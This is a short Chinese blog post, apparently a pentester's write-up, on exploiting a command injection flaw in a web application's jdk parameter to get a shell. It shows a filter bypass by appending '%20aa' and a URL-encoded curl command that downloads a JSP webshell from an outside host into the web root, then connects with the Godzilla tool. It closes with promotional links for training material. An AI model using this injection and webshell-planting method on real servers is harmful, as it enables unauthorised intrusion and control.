写点什么

从命令执行到 GetShell,适合新手学习

发布于: 2 小时前

最近做项目遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。



从代码中可以看出来程序只使用 trim()方法对 jdk 进行了两遍的空格过滤,然后直接和后面拼接的命令一起执行。


接着来找一下这个方法的调用链,



可以看到这里依次调用了 3 个命令执行的方法,如果命令都能成功执行的话,可以执行 3 次。


然后找一下这个 jdk 参数是否是我们可控的,



上面的代码显示 jdk 这个参数是从请求中获取的,看到这里已经能确定是个命令执行漏洞了,下面我们来利用这个漏洞。



执行了 ls&&结果报错,看显示结果发现过滤了 &&,然后把 &转编码发现还是会报错,但是从服务端代码来看并没有做参数的过滤。



最终经过多次 FUZZ 尝试发现在命令后面加上 %20aa 就可以正常执行命令了,尝试直接 echo 写 shell 没成功,使用下载文件的方式 getshell。


搭建一个 http 服务,添加一句话木马文件



执行下面的命令进行 getshell


curl%20-o%20../../webapps/xxxxx/xx.jsp%20http://xx.xx.xx.xx/hoo.jsp%20aa
复制代码



使用哥斯拉进行连接



2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册。必备工具包)戳我拿

用户头像

我是一名网络安全渗透师 2021.06.18 加入

关注我,后续将会带来更多精选作品,需要资料+wx:mengmengji08

评论

发布
暂无评论
从命令执行到GetShell,适合新手学习